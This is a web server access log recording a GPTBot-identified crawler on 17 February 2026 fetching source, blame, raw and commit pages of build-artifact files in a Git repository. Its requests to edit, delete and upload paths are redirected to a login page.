AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 9867] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 1015] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:43:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:43:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache?display=source" [Client 74.7.227.38] [Length 11356] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:17:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:43:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug" +[17/Feb/2026:17:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug" +[17/Feb/2026:17:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug" [Client 74.7.227.38] [Length 9810] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug" +[17/Feb/2026:17:43:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:43:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:43:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:43:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:43:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:43:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:43:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:43:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:43:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal/obj/Debug" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug" +[17/Feb/2026:17:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal/obj/Debug" +[17/Feb/2026:17:43:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug" +[17/Feb/2026:17:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug" +[17/Feb/2026:17:43:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:17:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:17:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 987] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:17:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 465] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:17:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:17:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:17:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 10683] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:17:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 10519] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:17:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 9851] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:17:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:17:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 9857] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:17:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 10294] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:17:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 981] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:17:43:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:17:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:17:43:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:17:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:17:43:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:17:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:17:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:17:43:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:17:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:17:43:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:17:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:17:43:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:17:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" +[17/Feb/2026:17:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 